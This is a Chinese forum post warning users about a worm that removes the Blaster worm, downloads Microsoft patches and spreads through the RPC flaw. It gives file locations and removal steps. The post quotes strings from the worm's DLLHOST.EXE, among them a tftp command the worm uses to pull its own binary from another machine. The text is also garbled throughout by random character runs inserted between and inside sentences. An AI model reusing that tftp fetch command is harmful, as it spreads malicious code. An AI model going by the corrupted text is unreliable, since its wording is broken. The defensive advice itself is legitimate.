|
该病毒的特点是将“冲击波”(Worm.Blaster)病& I, |2 [4 E" G
# p! f# ?- O8 [. {% I! r: i
毒干掉,并在系统内值入,预防冲击波病毒的疫苗。" \6 n" L& t/ U
: T8 E8 b$ P! g, H( ~8 r/ Q% }
然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然
1 t; L, t2 }9 y1 B) r; C, Z \8 }3 f" ?* E: V+ j% D
后该病毒会开启数百个的线程PING其它IP地址,并通过RPC漏洞快速传播自己,
* x8 w6 b8 L* z. C8 C6 T+ R$ }
+ A: L! I6 g& W$ A消耗大量CPU和网络资源,并且有可能会导致系统死机。该病毒的作者似乎无意: \1 ~( `" N1 u) @
, O* G' H% _3 ?# t! r
作恶,病毒设定在2004年自行毁灭。
9 P$ ~' _$ C& n- i. L$ Y" @5 } x+ x ~. N5 [0 `
由于该病毒采用PING方式进行探测,只感染能够PING通的机器,因此广大用户,; g3 f$ `8 }- _7 |# f( z
3 T+ j5 {! ]# r
设置防火墙的规则,禁止ping,这样可以有效防止该病毒的入侵。& t$ Q9 j5 d# O
6 |. y$ e q" |/ Y/ Z9 ]0 W
$ ^- S9 s! I; [: D# k如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙,,这是中国人自己编译的病毒7 p- [! x+ ?) b, b# A: B/ U5 a
+ H) H2 U) ?) s. ]2 C; ISVCHOST.EXE 大小是19.2K
' f X" ^5 @& P& r! i3 A: G* dDLLHOST.EXE 大小是10.K5 K6 ?) L8 Z# [- \8 [! x
! M5 c+ j( L) \8 U. g, _
DLLHOST.EXE里面有这样的话!' E! J! z' I+ Z! s8 W! H; W
% s2 p& W* ]( ]- v4 K+ M9 u
' {% u" s) C. N8 J% v5 n引用:' A7 U' f0 h! Y- N
U& G: f: L3 O=========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/downl...980-x86-KOR.exe ; http://download.microsoft.com/downl...980-x86-CHT.exe ; http://download.microsoft.com/downl...980-x86-CHS.exe ; http://download.microsoft.com/downl...980-x86-ENU.exe ; http://download.microsoft.com/downl...980-x86-KOR.exe ; http://download.microsoft.com/downl...980-x86-CHT.exe ; http://download.microsoft.com/downl...980-x86-CHS.exe ; http://download.microsoft.com/downl...980-x86-ENU.exe ; tftp -i %s get svchost.exe wins\SVCHOST.EXE
6 `3 Z$ B5 u1 a, h$ G. Y0 i6 F3 }8 o
这2个文件在在:%Windir%\system32\wins\目录里..(注意:不是:%Windir%\system32\..)
& S' Y. X2 |! Z4 p# U+ H
' V+ K+ T/ g% b; K& ]
1 |* J4 O" y, I! U紧急解决方案:
5 a6 O. a: A8 s9 H停止一下两个服务:
, F: G: s0 w0 N6 T" r9 t6 s0 |/ |- N, J, n* G6 }
Network connections Sharing2 R$ Z# E. x8 u) S
WINS Client- p+ Q5 H& z4 L- J
5 W' x' c+ F) L* I在:%Windir%\system32\wins\ - d: A7 X4 n* _, ~. @1 M: c/ L% a
目录下删除:
3 T- u3 C( J) O( Y) W% r# D
. ]; B9 M* C+ U6 QSVCHOST.EXE
8 B7 t8 J8 {7 D A/ d) }8 `% dDLLHOST.EXE
. {) t' t. b3 \: j, z* d: B% K8 B. J6 D% v
这两个文件,安装防火墙,并禁止PING。/ `4 U% X9 d% e9 p+ v
|
|